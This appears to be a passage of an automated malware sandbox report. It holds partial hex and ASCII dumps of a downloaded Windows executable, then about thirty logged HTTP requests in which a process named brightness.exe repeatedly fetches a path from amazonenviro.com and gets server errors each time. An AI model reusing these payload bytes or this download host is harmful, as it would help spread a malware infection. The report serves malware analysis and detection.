              Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d0 06 00 00 e4 0a 00 00 00 00 00 0c e8 06 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED]
              Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@@@Pn& |TW.text `.itextH `.data@ @.bss6.idatan&P(@.tls4.rdata@@.reloc|~@B.rsrc @@@@@
              Jan 10, 2025 08:58:57.577927113 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01
              Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@string@WideString@@
              Jan 10, 2025 08:58:57.577936888 CET448INData Raw: 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 8b 48 38 89 4a 38 df 7a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df
              Data Ascii: (z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l|<x,<DD@,<xH9JtG!(G
              Jan 10, 2025 08:58:57.578007936 CET1236INData Raw: ff ff 23 50 fc 8b 0d 20 17 47 00 29 c8 01 ca eb b9 c3 90 53 8b d8 e8 8c ff ff ff 6a 04 68 00 10 00 00 68 00 00 14 00 6a 00 e8 cd fc ff ff 85 c0 74 4d 8b 15 0c 17 47 00 8b c8 c7 01 08 17 47 00 a3 0c 17 47 00 89 51 04 89 02 8b d0 81 c2 00 00 14 00
              Data Ascii: #P G)SjhhjtMGGGQ+ G+G[3 G3[=MGt4 jn7G3tjU7G3uSVWUNjhVj
              Jan 10, 2025 08:58:57.578016996 CET1236INData Raw: 50 fc f6 c2 07 89 c1 53 8a 1d 4d 10 47 00 0f 85 cb 00 00 00 84 db 8b 1a 75 61 83 6a 0c 01 8b 42 08 74 2c 85 c0 89 4a 08 8d 40 01 89 41 fc 74 07 31 c0 88 03 5b c3 90 8b 4b 04 89 5a 14 89 4a 04 89 51 14 89 53 04 c6 03 00 31 c0 5b c3 90 90 85 c0 74
              Data Ascii: PSMGuajBt,J@At1[KZJQS1[tBJHA19SuCRMGp#tQRjZY#zQRjZY%Gt6jr%Gt j\Vu
              Jan 10, 2025 08:58:57.578022003 CET448INData Raw: 83 e9 18 39 ca 76 44 89 c8 c1 e9 02 01 c1 31 c0 29 d1 83 d0 ff 21 c8 01 d0 89 c3 52 e8 a2 f7 ff ff 5a 85 c0 74 22 81 fb 2c 0a 04 00 76 03 89 50 f8 8b 4e f8 89 c3 89 c2 89 f0 e8 d4 f4 ff ff 89 f0 e8 e5 fa ff ff 89 d8 5e 5b c3 d1 e9 39 ca 72 06 89
              Data Ascii: 9vD1)!RZt",vPN^[9rP^[ct,vX^[1^[@SX$,sx[u3@= Gt
              Jan 10, 2025 08:58:57.617119074 CET1236INData Raw: 92 8d 14 92 83 f9 01 83 df ff c1 e8 1a 81 e2 ff ff ff 03 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 19 81 e2 ff ff ff 01 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 18 81 e2 ff ff ff 00 09 c1 83 c8 30 88 07
              Data Ascii: 0000?000G_@SV^[USVE@;rM
              Jan 10, 2025 08:58:57.617173910 CET224INData Raw: d8 07 fe ff ff 85 f8 47 fe ff 8b c3 e8 1e fa ff ff 8b d8 85 db 75 8e 8b 7f 04 81 ff 08 17 47 00 0f 85 72 ff ff ff 8b 1d b0 37 47 00 eb 37 8b c3 83 c0 10 e8 5f fd ff ff 84 c0 75 26 c6 85 ff 47 fe ff 00 8b 73 0c 83 e6 f0 83 ee 04 83 ee 10 8b 85 f8
              Data Ascii: GuGr7G7_u&GsGG[7GtG|GXG3G)@(AG7G>FOGGG
              Jan 10, 2025 08:58:57.617203951 CET1236INData Raw: f6 47 fe ff 00 bf ff 00 00 00 8b 85 d8 47 fe ff 8b f0 8d 85 d7 ff fd ff 3b d8 0f 87 09 01 00 00 83 3e 00 0f 86 f3 00 00 00 80 bd f7 47 fe ff 00 75 1a b8 c4 29 40 00 b9 27 00 00 00 8b d3 e8 c8 fa ff ff 8b d8 c6 85 f7 47 fe ff 01 80 bd f6 47 fe ff
              Data Ascii: GG;>Gu)@'GGuOCCG@ C-C CGi)@rG,C Crt*)@C9*@.$F
              Jan 10, 2025 08:58:57.617254019 CET1236INData Raw: 00 00 74 12 a1 c4 37 47 00 50 e8 14 e7 ff ff 33 c0 a3 c4 37 47 00 80 3d b4 15 47 00 00 74 05 e8 63 f9 ff ff 83 3d bc 37 47 00 00 74 19 68 00 80 00 00 6a 00 a1 bc 37 47 00 50 e8 d4 e6 ff ff 33 c0 a3 bc 37 47 00 e8 20 ff ff ff c3 8d 40 00 85 c0 74
              Data Ascii: t7GP37G=Gtc=7Gthj7GP37G @t(FtQ~Ft91t Fut2tP$FYt FutPFYt@g:
              Jan 10, 2025 08:58:57.617285967 CET1236INData Raw: e2 03 74 1c 8a 0e 3a 0f 75 2f 4a 74 13 8a 4e 01 3a 4f 01 75 24 4a 74 08 8a 4e 02 3a 4f 02 75 19 01 c0 eb 15 5a 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e
              Data Ascii: t:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[ |=ffHfHfHT)T|


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.449752166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:26.133274078 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:27.068224907 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:26 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.449754166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:27.400490046 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:28.327038050 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:28 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.449756166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:28.509505033 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:29.414518118 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:29 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.449759166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:29.620853901 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:30.535300970 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:30 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.449761166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:30.693134069 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:31.611861944 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:31 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.449763166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:31.773597956 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:32.711414099 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:32 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.449765166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:32.871587992 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:33.779359102 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:33 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.449767166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:33.920243025 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:34.882731915 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:34 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.449770166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:35.045032024 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:35.969995975 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:35 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.449772166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:36.130758047 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:37.051531076 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:36 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.449774166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:37.195750952 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:38.143450022 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:37 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.449777166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:38.295550108 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:39.232263088 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:39 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.449787166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:39.387639046 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:40.314548016 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:40 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.449796166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:40.476210117 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:41.376718998 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:41 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.449803166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:41.531194925 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:42.451180935 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:42 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.449815166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:42.609934092 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:43.526401997 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:43 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.449822166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:43.666394949 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:44.599970102 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:44 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.449831166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:44.739330053 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:45.662324905 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:45 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.449841166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:45.802113056 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:46.733742952 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:46 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.449847166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:46.898849010 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:47.802615881 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:47 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.449855166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:47.953768015 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:48.886893034 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:48 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.449863166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:49.026380062 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:49.953263998 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:49 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.449872166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:50.115751028 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:51.061712027 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:50 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.449882166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:51.203576088 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:52.122479916 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:51 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.449889166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:52.264478922 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:53.167829037 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:53 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.449900166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:53.316425085 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:54.246026993 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:54 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.449908166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:54.390418053 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:55.323048115 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:55 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.449916166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:55.462063074 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:56.411364079 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:56 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.449925166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:59:56.587902069 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              Jan 10, 2025 08:59:57.503993988 CET244INHTTP/1.1 500 Internal Server Error
              Date: Fri, 10 Jan 2025 07:59:57 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.449934166.62.27.188807972C:\Windows\SysWOW64\brightness.exe
              TimestampBytes transferredDirectionData
